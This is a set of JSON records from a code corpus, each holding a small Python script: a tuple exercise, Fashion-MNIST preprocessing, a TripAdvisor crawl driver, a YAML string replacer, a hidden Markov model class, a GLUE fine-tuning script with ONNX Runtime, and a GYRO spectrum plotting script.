+{"seq_id":"77357388","text":"num = (int(input('Digite um número: ')),\n int(input('Digite outro número: ')),\n int(input('Digite mais um número: ')),\n int(input('Digite o último número: ')))\npar = 0\nprint(f'Você digitou os valores: {num}')\nif 9 in num:\n print(f'O valor 9 apareceu {num.count(9)} vezes.')\nelse:\n print(f'O valor 9 não foi digitado')\nif 3 in num :\n print(f'O valor 3 apareceu na {num.index(3)+1}ª posição.')\nelse:\n print(f'O valor 3 não foi digitado.')\nfor i in num:\n if i % 2 == 0:\n par += 1\nprint(f'Os valores pares digitados foram {par}')\n","sub_path":"ex075.py","file_name":"ex075.py","file_ext":"py","file_size_in_byte":577,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"6087205","text":"#Keras supplies many datasets in their library aptly named datasets\nfrom keras.datasets import fashion_mnist #https://keras.io/datasets/\n\n#We store the training and testing images in the following variables\n\n(train_X, train_Y), (test_X, test_Y) = fashion_mnist.load_data()\n\n\nimport numpy as np #for linear algebra\n\n#To see what dimensions I am working with:\nprint(\"Dimension of training input and output\")\nprint(train_X.shape, train_Y.shape)\n#(60000, 28, 28), (60000,)\nprint(\"Dimensions of test input and output\")\nprint(test_X.shape, test_Y.shape)\n#(10000, 28, 28), (10000,)\n\"\"\"\nSo training data is 60000 samples with each sample havinga 28x28 pixel dimension\nand the test data is 10000 samples with the same dimensions\n\nNext we find the number of unique labels in the output using numpy\n\"\"\"\nprint(\"Unique labels to classify and total number of unique lables \")\nprint(np.unique(train_Y), len(np.unique(train_Y)))\n#(array([0,1,2,3,4,5,6,7,8,9]), 10)\n\"\"\"\nThere are 10 total output labels ranging from 0 - 9\nNow we want to reshape the images into a matrix of 28x28x1 to feed the CNN\nand then normalize the data into a float format ranging from 0-1.\n\"\"\"\ntrain_X = train_X.reshape(-1, 28, 28, 1)\ntest_X = test_X.reshape(-1, 28, 28, 1)\n#Reshapes to ((60000, 28, 28, 1), (10000, 28, 28, 1))\n\ntrain_X = train_X.astype('float32')\ntest_X = test_X.astype('float32')\n\ntrain_X = train_X / 255.0\ntest_X = test_X / 255.0\n\n\"\"\"\nNow the NN is not going to understand the labels in the train_Y and test_Y\nthe way they are now, so we must transform the labels into a 'vector'\ni.e if the output label is 1, we want the vector to be [0, 1, 0, 0, 0, 0, 0, 0, 0, 0]\nand if the label is 9 -> [0, 0, 0, 0, 0, 0, 0, 0, 0, 1]\n\"\"\"\nfrom keras.utils import to_categorical #https://keras.io/utils/\n#converts an array into a binary class matrix\ntrain_Y_binary = to_categorical(train_Y)\n#Converts all to the binary representation\ntest_Y_binary = to_categorical(test_Y)\n#both have size (N, 10) where N is number of samples - 60000 for train and 10000 for test\n\"\"\"\nAlways important in ML is splitting of the data into two parts, one for training and one for validation\nI choose a 80% to 20% split of training data to validate data respectively\nIn addition, we can randomize the data order with sklearns train_test_split\n\n\"\"\"\nfrom sklearn.model_selection import train_test_split #https://scikit-learn.org/stable/modules/generated/sklearn.model_selection.train_test_split.html\ntrain_X,valid_X,train_label,valid_label = train_test_split(train_X, train_Y_binary, test_size=0.2, random_state=13)\n#train_X.shape: (48000, 28, 28, 1), valid_X.shape: (12000, 28, 28, 1), train_label.shape: (48000, 10), valid_label.shape: (12000, 10)\n#Now we are ready to use the data:\n","sub_path":"initial_data_analysis.py","file_name":"initial_data_analysis.py","file_ext":"py","file_size_in_byte":2725,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"524187988","text":"\"\"\"\nThis file reads city names from cities-queue.txt and starts running crawl from the top.\nAfter reading a city name it deletes the line. Hence, the next un-crawled city name comes to the top.\nSo, multiple instances of this script can be run at the same time to increase efficiency.\n\"\"\"\nimport json\nimport os\nfrom urllib.request import urlopen\nfrom general import append_to_file\n\nwith open('cities-queue.txt') as infile:\n characters = 0\n for line in infile:\n wordslist = line.split()\n characters += sum(len(word)+1 for word in wordslist)\n\n\nwhile True:\n city = None\n rf = open(\"run.py-offset-setter.txt\", \"r\")\n offset = int(rf.readline()[9:].strip())\n rf.close()\n\n if offset >= characters:\n break\n\n with open('cities-queue.txt', 'r+') as f:\n while True:\n f.seek(offset, 0)\n line = f.readline()\n offset = offset + len(line)\n\n rf = open(\"run.py-offset-setter.txt\", \"w\")\n rf.write(\"offset = \" + str(offset))\n rf.close()\n\n if not line or line == \"\\n\":\n continue\n\n if line.strip()[0] != \"#\":\n city = line.strip()\n break\n\n city_url_name = city.replace(\" \", \"%20\")\n \"\"\"\n Find document ID from url\n \"\"\"\n url = \"https://www.tripadvisor.in/TypeAheadJson?action=API&query=\" + city_url_name + \"&types=geo&name_\" \\\n \"depth=1&details=true&legacy_format=true&rescue=true&max=8&uiOrigin=Attractions_\" \\\n \"geopicker&source=Attractions_geopicker&searchSessionId=7B739CEC86558248C6D84290316117ED1575889411248ssid&\" \\\n \"scope=1&beforeGeoId=1&afterGeoId=1&startTime=1575892064630\"\n\n json_url = urlopen(url)\n data = json.loads(json_url.read())\n try:\n document_id = data[0].get(\"document_id\")\n except Exception as e:\n document_id = None\n if document_id is None or document_id.isdigit() is False:\n append_to_file(\"list-of-cities-not-found.txt\", city)\n print(\"document_id not found\")\n continue\n print(city + \": Document ID:\" + document_id)\n\n cmd = \"python tripadvis-crawl.py --city=\\\"\" + city + \"\\\" --id=\" + document_id\n os.system(cmd)\n","sub_path":"run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":2197,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"215083333","text":"#Change strings in multiple files \nimport sys\nimport time\n\nfilename=['enable_custom_list_machine.yml','disable_custom_list_machine.yml']\n\n### Backup \nfor i1 in range(len(filename)):\n f1=open(filename[i1],'r')\n m=f1.read()\n f_back=open(filename[i1]+time.strftime(\"_%Y\"),'w')\n for i2 in m:\n f_back.write(i2)\n \n n=len(m)\n for i4 in range(n): \n#Next statement checks 11 characters as we are searching for string 'are'\n if m[i4:i4+11]=='text_change':\n m_new=m.replace('text_change',sys.argv[1])\n d2=open(filename[i1],'w')\n for i5 in m_new:\n d2.write(i5)\n\n\n\n\n","sub_path":"zango/Notif_Auto2/replace_string.py","file_name":"replace_string.py","file_ext":"py","file_size_in_byte":640,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"309272409","text":"import numpy as np\nimport numpy.random as npr\n\nfrom scipy.special import logsumexp\n\nfrom sds_numpy.initial import CategoricalInitState\nfrom sds_numpy.transitions import StationaryTransition\nfrom sds_numpy.observations import GaussianObservation\n\nfrom sds_numpy.utils import ensure_args_are_viable_lists\nfrom sds_numpy.cython.hmm_cy import forward_cy, backward_cy\n\nfrom tqdm import trange\n\nto_c = lambda arr: np.copy(arr, 'C')\\\n if not arr.flags['C_CONTIGUOUS'] else arr\n\n\nclass HMM:\n\n def __init__(self, nb_states, dm_obs, dm_act=0,\n init_state_prior={}, trans_prior={}, obs_prior={},\n init_state_kwargs={}, trans_kwargs={}, obs_kwargs={}):\n\n self.nb_states = nb_states\n self.dm_obs = dm_obs\n self.dm_act = dm_act\n\n self.init_state = CategoricalInitState(self.nb_states, prior=init_state_prior, **init_state_kwargs)\n self.transitions = StationaryTransition(self.nb_states, prior=trans_prior, **trans_kwargs)\n self.observations = GaussianObservation(self.nb_states, self.dm_obs, self.dm_act,\n prior=obs_prior, **obs_kwargs)\n\n @property\n def params(self):\n return self.init_state.params, \\\n self.transitions.params, \\\n self.observations.params\n\n @params.setter\n def params(self, value):\n self.init_state.params = value[0]\n self.transitions.params = value[1]\n self.observations.params = value[2]\n\n @ensure_args_are_viable_lists\n def initialize(self, obs, act=None, **kwargs):\n self.init_state.initialize()\n if hasattr(self, 'init_observation'):\n self.init_observation.initialize(obs)\n self.transitions.initialize(obs, act)\n self.observations.initialize(obs, act)\n\n def permute(self, perm):\n self.init_state.permute(perm)\n self.transitions.permute(perm)\n self.observations.permute(perm)\n\n def log_priors(self):\n logprior = 0.0\n logprior += self.init_state.log_prior()\n logprior += self.transitions.log_prior()\n logprior += self.observations.log_prior()\n return logprior\n\n @ensure_args_are_viable_lists\n def log_likelihoods(self, obs, act=None):\n loginit = self.init_state.log_init()\n logtrans = self.transitions.log_transition(obs, act)\n logobs = self.observations.log_likelihood(obs, act)\n return loginit, logtrans, logobs\n\n def log_norm(self, obs, act=None):\n loglikhds = self.log_likelihoods(obs, act)\n _, norm = self.forward(*loglikhds)\n return np.sum(np.hstack(norm))\n\n def log_probability(self, obs, act=None):\n return self.log_norm(obs, act) + self.log_priors()\n\n def forward(self, loginit, logtrans, logobs, logctl=None, cython=True):\n if logctl is None:\n logctl = []\n for _logobs in logobs:\n logctl.append(np.zeros((_logobs.shape[0], self.nb_states)))\n\n alpha, norm = [], []\n for _logobs, _logctl, _logtrans in zip(logobs, logctl, logtrans):\n T = _logobs.shape[0]\n _alpha = np.zeros((T, self.nb_states))\n _norm = np.zeros((T, ))\n\n if cython:\n forward_cy(to_c(loginit), to_c(_logtrans),\n to_c(_logobs), to_c(_logctl),\n to_c(_alpha), to_c(_norm))\n else:\n for k in range(self.nb_states):\n _alpha[0, k] = loginit[k] + _logobs[0, k]\n _norm[0] = logsumexp(_alpha[0], axis=-1, keepdims=True)\n _alpha[0] = _alpha[0] - _norm[0]\n\n _aux = np.zeros((self.nb_states,))\n for t in range(1, T):\n for k in range(self.nb_states):\n for j in range(self.nb_states):\n _aux[j] = _alpha[t - 1, j] + _logtrans[t - 1, j, k]\n _alpha[t, k] = logsumexp(_aux) + _logobs[t, k] + _logctl[t, k]\n\n _norm[t] = logsumexp(_alpha[t], axis=-1, keepdims=True)\n _alpha[t] = _alpha[t] - _norm[t]\n\n alpha.append(_alpha)\n norm.append(_norm)\n return alpha, norm\n\n def backward(self, loginit, logtrans, logobs,\n logctl=None, scale=None, cython=True):\n if logctl is None:\n logctl = []\n for _logobs in logobs:\n logctl.append(np.zeros((_logobs.shape[0], self.nb_states)))\n\n beta = []\n for _logobs, _logctl, _logtrans, _scale in zip(logobs, logctl, logtrans, scale):\n T = _logobs.shape[0]\n _beta = np.zeros((T, self.nb_states))\n\n if cython:\n backward_cy(to_c(loginit), to_c(_logtrans),\n to_c(_logobs), to_c(_logctl),\n to_c(_beta), to_c(_scale))\n else:\n for k in range(self.nb_states):\n _beta[T - 1, k] = 0.0 - _scale[T - 1]\n\n _aux = np.zeros((self.nb_states,))\n for t in range(T - 2, -1, -1):\n for k in range(self.nb_states):\n for j in range(self.nb_states):\n _aux[j] = _logtrans[t, k, j] + _beta[t + 1, j]\\\n + _logobs[t + 1, j] + _logctl[t + 1, j]\n _beta[t, k] = logsumexp(_aux) - _scale[t]\n\n beta.append(_beta)\n return beta\n\n def posterior(self, alpha, beta):\n return [np.exp(_alpha + _beta - logsumexp(_alpha + _beta, axis=1, keepdims=True))\n for _alpha, _beta in zip(alpha, beta)]\n\n def joint_posterior(self, alpha, beta, loginit, logtrans, logobs, logctl=None):\n if logctl is None:\n logctl = []\n for _logobs in logobs:\n logctl.append(np.zeros((_logobs.shape[0], self.nb_states)))\n\n zeta = []\n for _logobs, _logctl, _logtrans, _alpha, _beta in\\\n zip(logobs, logctl, logtrans, alpha, beta):\n _zeta = _alpha[:-1, :, None] + _beta[1:, None, :] + _logtrans\\\n + _logobs[1:, :][:, None, :] + _logctl[1:, :][:, None, :]\n\n _zeta -= _zeta.max((1, 2))[:, None, None]\n _zeta = np.exp(_zeta)\n _zeta /= _zeta.sum((1, 2))[:, None, None]\n\n zeta.append(_zeta)\n return zeta\n\n @ensure_args_are_viable_lists\n def viterbi(self, obs, act=None):\n loginit, logtrans, logobs = self.log_likelihoods(obs, act)[0:3]\n\n delta = []\n z = []\n for _logobs, _logtrans in zip(logobs, logtrans):\n T = _logobs.shape[0]\n\n _delta = np.zeros((T, self.nb_states))\n _args = np.zeros((T, self.nb_states), np.int64)\n _z = np.zeros((T, ), np.int64)\n\n for t in range(T - 2, -1, -1):\n _aux = _logtrans[t, :] + _delta[t + 1, :] + _logobs[t + 1, :]\n _delta[t, :] = np.max(_aux, axis=1)\n _args[t + 1, :] = np.argmax(_aux, axis=1)\n\n _z[0] = np.argmax(loginit + _delta[0, :] + _logobs[0, :], axis=0)\n for t in range(1, T):\n _z[t] = _args[t, _z[t - 1]]\n\n delta.append(_delta)\n z.append(_z)\n\n return delta, z\n\n def estep(self, obs, act=None):\n loglikhds = self.log_likelihoods(obs, act)\n alpha, norm = self.forward(*loglikhds)\n beta = self.backward(*loglikhds, scale=norm)\n gamma = self.posterior(alpha, beta)\n zeta = self.joint_posterior(alpha, beta, *loglikhds)\n\n return gamma, zeta\n\n def mstep(self, gamma, zeta,\n obs, act,\n init_mstep_kwargs,\n trans_mstep_kwargs,\n obs_mstep_kwargs, **kwargs):\n\n if hasattr(self, 'init_observation'):\n self.init_observation.mstep(gamma, obs)\n\n self.init_state.mstep(gamma, **init_mstep_kwargs)\n self.transitions.mstep(zeta, obs, act, **trans_mstep_kwargs)\n self.observations.mstep(gamma, obs, act, **obs_mstep_kwargs)\n\n @ensure_args_are_viable_lists\n def em(self, train_obs, train_act=None, nb_iter=50, prec=1e-4,\n init_mstep_kwargs={}, trans_mstep_kwargs={},\n obs_mstep_kwargs={}, **kwargs):\n\n process_id = kwargs.get('process_id', 0)\n\n train_lls = []\n train_ll = self.log_norm(train_obs, train_act)\n train_lls.append(train_ll)\n last_train_ll = train_ll\n\n pbar = trange(nb_iter, position=process_id)\n pbar.set_description(\"#{}, ll: {:.5f}\".format(process_id, train_lls[-1]))\n\n for _ in pbar:\n gamma, zeta = self.estep(train_obs, train_act)\n self.mstep(gamma, zeta, train_obs, train_act,\n init_mstep_kwargs,\n trans_mstep_kwargs,\n obs_mstep_kwargs,\n **kwargs)\n\n train_ll = self.log_norm(train_obs, train_act)\n train_lls.append(train_ll)\n\n pbar.set_description(\"#{}, ll: {:.5f}\".format(process_id, train_lls[-1]))\n\n if abs(train_ll - last_train_ll) < prec:\n break\n else:\n last_train_ll = train_ll\n\n return train_lls\n\n @ensure_args_are_viable_lists\n def earlystop_em(self, train_obs, train_act=None, nb_iter=50, prec=1e-4,\n init_mstep_kwargs={}, trans_mstep_kwargs={}, obs_mstep_kwargs={},\n test_obs=None, test_act=None, **kwargs):\n\n assert test_obs is not None and test_act is not None\n\n process_id = kwargs.get('process_id', 0)\n\n nb_train = np.vstack(train_obs).shape[0]\n nb_test = np.vstack(test_obs).shape[0]\n nb_all = nb_train + nb_test\n\n train_lls = []\n train_ll = self.log_norm(train_obs, train_act)\n train_lls.append(train_ll)\n last_train_ll = train_ll\n\n test_lls = []\n test_ll = self.log_norm(test_obs, test_act)\n test_lls.append(test_ll)\n last_test_ll = test_ll\n\n all_ll = last_train_ll + last_test_ll\n\n score = (all_ll - train_ll) / (nb_all - nb_train)\n last_score = score\n\n pbar = trange(nb_iter, position=process_id)\n pbar.set_description(\"#{}, train_ll: {:.5f}, test_ll: {:.5f},\"\n \" score: {:.5f}\".format(process_id, train_ll, test_ll, score))\n\n for _ in pbar:\n gamma, zeta = self.estep(train_obs, train_act)\n self.mstep(gamma, zeta, train_obs, train_act,\n init_mstep_kwargs,\n trans_mstep_kwargs,\n obs_mstep_kwargs,\n **kwargs)\n\n train_ll = self.log_norm(train_obs, train_act)\n train_lls.append(train_ll)\n\n test_ll = self.log_norm(test_obs, test_act)\n test_lls.append(test_ll)\n\n all_ll = train_ll + test_ll\n score = (all_ll - train_ll) / (nb_all - nb_train)\n\n pbar.set_description(\"#{}, train_ll: {:.5f}, test_ll: {:.5f},\"\n \"score: {:.5f}\".format(process_id, train_ll, test_ll, score))\n\n if abs(score - last_score) < prec:\n break\n else:\n last_score = score\n\n return train_lls\n\n @ensure_args_are_viable_lists\n def mean_observation(self, obs, act=None):\n loglikhds = self.log_likelihoods(obs, act)\n alpha, norm = self.forward(*loglikhds)\n beta = self.backward(*loglikhds, scale=norm)\n gamma = self.posterior(alpha, beta)\n\n mean_obs = self.observations.smooth(gamma, obs, act)\n return mean_obs\n\n @ensure_args_are_viable_lists\n def filter(self, obs, act=None):\n logliklhds = self.log_likelihoods(obs, act)\n alpha, _ = self.forward(*logliklhds)\n belief = [np.exp(_alpha - logsumexp(_alpha, axis=1, keepdims=True))\n for _alpha in alpha]\n return belief\n\n def sample(self, act=None, horizon=None):\n state = []\n obs = []\n\n for n in range(len(horizon)):\n _act = np.zeros((horizon[n], self.dm_act)) if act is None else act[n]\n _obs = np.zeros((horizon[n], self.dm_obs))\n _state = np.zeros((horizon[n],), np.int64)\n\n _state[0] = self.init_state.sample()\n _obs[0, :] = self.observations.sample(_state[0])\n for t in range(1, horizon[n]):\n _state[t] = self.transitions.sample(_state[t - 1], _obs[t - 1, :], _act[t - 1, :])\n _obs[t, :] = self.observations.sample(_state[t], _obs[t - 1, :], _act[t - 1, :])\n\n state.append(_state)\n obs.append(_obs)\n\n return state, obs\n\n def step(self, obs, act, belief, stoch=True, average=False):\n if stoch:\n # it doesn't make sense to average while sampling\n assert not average\n\n if stoch:\n state = npr.choice(self.nb_states, p=belief)\n nxt_state = self.transitions.sample(state, obs, act)\n nxt_obs = self.observations.sample(nxt_state, obs, act)\n else:\n if average:\n nxt_state = None\n\n # average over transitions and belief space\n _logtrans = np.squeeze(self.transitions.log_transition(obs, act)[0])\n _trans = np.exp(_logtrans - logsumexp(_logtrans, axis=1, keepdims=True))\n\n _zeta = _trans.T @ belief\n _nxt_belief = _zeta / _zeta.sum()\n\n nxt_obs = np.zeros((1, self.dm_obs))\n for k in range(self.nb_states):\n nxt_obs += _nxt_belief[k] * self.observations.mean(k, obs, act)\n else:\n state = np.argmax(belief)\n nxt_state = self.transitions.likeliest(state, obs, act)\n nxt_obs = self.observations.mean(nxt_state, obs, act)\n\n return nxt_state, nxt_obs\n\n def forcast(self, hist_obs=None, hist_act=None, nxt_act=None,\n horizon=None, stoch=False, average=False):\n\n nxt_state = []\n nxt_obs = []\n\n for n in range(len(horizon)):\n _hist_obs = hist_obs[n]\n _hist_act = hist_act[n]\n\n _nxt_act = np.zeros((horizon[n], self.dm_act)) if nxt_act is None else nxt_act[n]\n _nxt_obs = np.zeros((horizon[n] + 1, self.dm_obs))\n _nxt_state = np.zeros((horizon[n] + 1,), np.int64)\n\n _belief = self.filter(_hist_obs, _hist_act)[0][-1, ...]\n\n if stoch:\n _nxt_state[0] = npr.choice(self.nb_states, p=_belief)\n _nxt_obs[0, :] = _hist_obs[-1, ...]\n for t in range(horizon[n]):\n _nxt_state[t + 1] = self.transitions.sample(_nxt_state[t], _nxt_obs[t, :], _nxt_act[t, :])\n _nxt_obs[t + 1, :] = self.observations.sample(_nxt_state[t + 1], _nxt_obs[t, :], _nxt_act[t, :])\n else:\n if average:\n # return empty discrete state when mixing\n _nxt_state = None\n\n _nxt_obs[0, :] = _hist_obs[-1, ...]\n for t in range(horizon[n]):\n\n # average over transitions and belief space\n _logtrans = np.squeeze(self.transitions.log_transition(_nxt_obs[t, :], _nxt_act[t, :])[0])\n _trans = np.exp(_logtrans - logsumexp(_logtrans, axis=1, keepdims=True))\n\n # update belief\n _zeta = _trans.T @ _belief\n _belief = _zeta / _zeta.sum()\n\n # average observations\n for k in range(self.nb_states):\n _nxt_obs[t + 1, :] += _belief[k] * self.observations.mean(k, _nxt_obs[t, :], _nxt_act[t, :])\n else:\n _nxt_state[0] = np.argmax(_belief)\n _nxt_obs[0, :] = _hist_obs[-1, ...]\n for t in range(horizon[n]):\n _nxt_state[t + 1] = self.transitions.likeliest(_nxt_state[t], _nxt_obs[t, :], _nxt_act[t, :])\n _nxt_obs[t + 1, :] = self.observations.mean(_nxt_state[t + 1], _nxt_obs[t, :], _nxt_act[t, :])\n\n nxt_state.append(_nxt_state)\n nxt_obs.append(_nxt_obs)\n\n return nxt_state, nxt_obs\n\n @ensure_args_are_viable_lists\n def kstep_mse(self, obs, act, horizon=1, stoch=False, average=False):\n\n from sklearn.metrics import mean_squared_error,\\\n explained_variance_score, r2_score\n\n mse, smse, evar = [], [], []\n for _obs, _act in zip(obs, act):\n _hist_obs, _hist_act, _nxt_act = [], [], []\n _target, _prediction = [], []\n\n _nb_steps = _obs.shape[0] - horizon\n for t in range(_nb_steps):\n _hist_obs.append(_obs[:t + 1, :])\n _hist_act.append(_act[:t + 1, :])\n _nxt_act.append(_act[t: t + horizon, :])\n\n _hr = [horizon for _ in range(_nb_steps)]\n _, _forcast = self.forcast(hist_obs=_hist_obs, hist_act=_hist_act,\n nxt_act=_nxt_act, horizon=_hr, stoch=stoch,\n average=average)\n\n for t in range(_nb_steps):\n _target.append(_obs[t + horizon, :])\n _prediction.append(_forcast[t][-1, :])\n\n _target = np.vstack(_target)\n _prediction = np.vstack(_prediction)\n\n _mse = mean_squared_error(_target, _prediction)\n _smse = 1. - r2_score(_target, _prediction, multioutput='variance_weighted')\n _evar = explained_variance_score(_target, _prediction, multioutput='variance_weighted')\n\n mse.append(_mse)\n smse.append(_smse)\n evar.append(_evar)\n\n return np.mean(mse), np.mean(smse), np.mean(evar)\n","sub_path":"sds_numpy/hmm.py","file_name":"hmm.py","file_ext":"py","file_size_in_byte":17930,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"226295170","text":"# -------------------------------------------------------------------------\n# Portions Copyright (c) Microsoft Corporation. All rights reserved.\n# --------------------------------------------------------------------------\n# Copyright 2020 The HuggingFace Inc. team. All rights reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\nimport numpy as np\nimport mlflow\nimport time\nfrom typing import Dict, Callable\nimport json\nimport os\n\n# from dataclasses import dataclass, field\nimport transformers\nfrom transformers import (\n AutoModelForSequenceClassification,\n AutoTokenizer,\n EvalPrediction,\n Trainer,\n HfArgumentParser,\n TrainingArguments,\n)\nfrom glue_datasets import (\n load_encoded_glue_dataset,\n num_labels_from_task,\n load_metric_from_task,\n)\n\n# pretraining\nfrom transformers import AutoConfig\nfrom transformers import DataCollatorForLanguageModeling\n\n# Azure ML imports - could replace this with e.g. wandb or mlflow\nfrom transformers.integrations import MLflowCallback\n\n# Pytorch Profiler\nimport torch.profiler.profiler as profiler\nfrom transformers import TrainerCallback\n\n# Onnx Runtime for training\nfrom optimum.onnxruntime import ORTTrainer, ORTTrainingArguments\n\n\ndef construct_compute_metrics_function(task: str) -> Callable[[EvalPrediction], Dict]:\n metric = load_metric_from_task(task)\n\n if task != \"stsb\":\n\n def compute_metrics_function(eval_pred: EvalPrediction) -> Dict:\n predictions, labels = eval_pred\n predictions = np.argmax(predictions, axis=1)\n return metric.compute(predictions=predictions, references=labels)\n\n else:\n\n def compute_metrics_function(eval_pred: EvalPrediction) -> Dict:\n predictions, labels = eval_pred\n predictions = predictions[:, 0]\n return metric.compute(predictions=predictions, references=labels)\n\n return compute_metrics_function\n\n\nif __name__ == \"__main__\":\n parser = HfArgumentParser(ORTTrainingArguments)\n parser.add_argument(\"--task\", default=\"cola\", help=\"name of GLUE task to compute\")\n parser.add_argument(\"--model_checkpoint\", default=\"bert-large-uncased\")\n parser.add_argument(\"--tensorboard_log_dir\", default=\"/outputs/runs/\")\n\n training_args, args = parser.parse_args_into_dataclasses()\n\n transformers.logging.set_verbosity_debug()\n\n task: str = args.task.lower()\n\n num_labels = num_labels_from_task(task)\n\n tokenizer = AutoTokenizer.from_pretrained(args.model_checkpoint, use_fast=True)\n context_length = 512\n\n model_config = AutoConfig.from_pretrained(\n args.model_checkpoint,\n vocab_size=len(tokenizer),\n n_ctx=context_length,\n bos_token_id=tokenizer.bos_token_id,\n eos_token_id=tokenizer.eos_token_id,\n )\n model = AutoModelForSequenceClassification.from_config(model_config)\n\n encoded_dataset_train, encoded_dataset_eval = load_encoded_glue_dataset(\n task=task, tokenizer=tokenizer\n )\n\n compute_metrics = construct_compute_metrics_function(args.task)\n\n # Create path for logging to tensorboard\n my_logs = os.environ[\"PWD\"] + args.tensorboard_log_dir\n\n # Custom HuggingFace trainer callback used for starting/stopping the pytorch profiler\n class ProfilerCallback(TrainerCallback):\n def on_train_begin(self, args, state, control, model=None, **kwargs):\n self.prof = profiler.profile(\n schedule=profiler.schedule(wait=2, warmup=1, active=3, repeat=2),\n activities=[\n profiler.ProfilerActivity.CPU,\n profiler.ProfilerActivity.CUDA,\n ],\n on_trace_ready=profiler.tensorboard_trace_handler(my_logs),\n record_shapes=True,\n with_stack=True,\n profile_memory=True,\n )\n self.prof.start()\n\n def on_train_end(self, args, state, control, model=None, **kwargs):\n self.prof.stop()\n\n def on_step_begin(self, args, state, control, model=None, **kwargs):\n self.prof.step()\n\n # Initialize huggingface trainer. This trainer will internally execute the training loop\n trainer = ORTTrainer(\n model=model,\n args=training_args,\n train_dataset=encoded_dataset_train,\n eval_dataset=encoded_dataset_eval,\n # data_collator=data_collator,\n tokenizer=tokenizer,\n compute_metrics=compute_metrics,\n callbacks=[ProfilerCallback],\n feature=\"sequence-classification\",\n )\n\n trainer.pop_callback(MLflowCallback)\n\n start = time.time()\n\n # pretrian the model!\n result = trainer.train()\n\n print(f\"Time: {result.metrics['train_runtime']:.2f}\")\n print(f\"Samples/second: {result.metrics['train_samples_per_second']:.2f}\")\n print(\"Training...\")\n\n mlflow.log_metric(\n \"time/epoch\", (time.time() - start) / 60 / training_args.num_train_epochs\n )\n\n print(\"Evaluation...\")\n\n trainer.evaluate()\n","sub_path":"best-practices/largescale-deep-learning/Training/Bert-Pretrain/src/pretrain_glue_ORT.py","file_name":"pretrain_glue_ORT.py","file_ext":"py","file_size_in_byte":5462,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"203237477","text":"# this script is used to plot the spectrum of omega(ky) & gamma(ky) for a given rho\n# Read some input parameter\niplotErr=root['SETTINGS']['PLOTS']['iplotErr']\nif root['INPUTS']['GYROInput']['input.gyro'].has_key('L_Y'):\n L_Y=root['INPUTS']['GYROInput']['input.gyro']['L_Y'] # the reference ky\nelse:\n L_Y=0.3\nif root['INPUTS']['GYROInput']['input.gyro'].has_key('TOROIDAL_GRID'):\n TOROIDAL_GRID=root['INPUTS']['GYROInput']['input.gyro']['TOROIDAL_GRID'] # the reference ky\nelse:\n TOROIDAL_GRID=1\nif root['INPUTS']['GYROInput']['input.gyro'].has_key('TOROIDAL_MIN'):\n TOROIDAL_MIN=root['INPUTS']['GYROInput']['input.gyro']['TOROIDAL_MIN'] # the reference ky\nelse:\n TOROIDAL_MIN=30\nif root['INPUTS']['GYROInput']['input.gyro'].has_key('TOROIDAL_SEP'):\n TOROIDAL_SEP=root['INPUTS']['GYROInput']['input.gyro']['TOROIDAL_SEP'] # the reference ky\nelse:\n TOROIDAL_SEP=10\n\nk=root['SETTINGS']['PLOTS']['ipltspectrum']\n#wr=ones(TOROIDAL_GRID)\n#wr_err=ones(TOROIDAL_GRID)\n#wi=ones(TOROIDAL_GRID)\n#wi_err=ones(TOROIDAL_GRID)\n#for k in linspace(0,TOROIDAL_GRID-1,TOROIDAL_GRID):\nwr=root['OUTPUTSRec']['GYROOutput'][k]['wr']\nwi=root['OUTPUTSRec']['GYROOutput'][k]['wi']\nwr_err=root['OUTPUTSRec']['GYROOutput'][k]['wr_err']\nwi_err=root['OUTPUTSRec']['GYROOutput'][k]['wi_err']\n# calculate ky\nky=L_Y/TOROIDAL_MIN*(TOROIDAL_MIN+linspace(0,TOROIDAL_GRID-1,TOROIDAL_GRID)*TOROIDAL_SEP)\n#rho=root['INPUTS']['GYROInput']['input.gyro']['RADIUS']\np_tgyro=root['SETTINGS']['PLOTS']['p_tgyro']\nrho_max=root['INPUTS']['TGYROInput']['input.tgyro']['TGYRO_RMAX']\nrho_all=linspace(0,rho_max,p_tgyro+1)\nrho=rho_all[k]\nfigure(5)\nfsize=24\nsubplot(1,2,1)\n#plot(ky,wr,'-bo',linewidth=2,label='rho='+str(rho)+' $\\omega$')\nplot(ky,wr,'-bo',linewidth=2,label='$\\omega$')\nif iplotErr==1:\n plot(ky,wr_err,'-ro',linewidth=2,label='$Error$')\n legend(loc=0).draggable(True)\nxlabel('$k_y$',fontsize=fsize,family='serif')\nylabel('$\\omega$',fontsize=fsize,family='serif')\nxticks(fontsize=16,family='serif')\nyticks(fontsize=16,family='serif')\ntitle('rho='+str(rho))\nsubplot(1,2,2)\nplot(ky,wi,'-b*',linewidth=2,label='$\\gamma$')\nif iplotErr==1:\n plot(ky,wi_err,'-r*',linewidth=2,label='$Error$')\n legend(loc=0).draggable(True)\nxticks(fontsize=16,family='serif')\nyticks(fontsize=16,family='serif')\nxlabel('$k_y$',fontsize=fsize,family='serif')\nylabel('$\\gamma$',fontsize=fsize,family='serif')\ntitle('rho='+str(rho))\n","sub_path":"MyInte/SCRIPTS/GYRO/plotspectrum.py","file_name":"plotspectrum.py","file_ext":"py","file_size_in_byte":2403,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
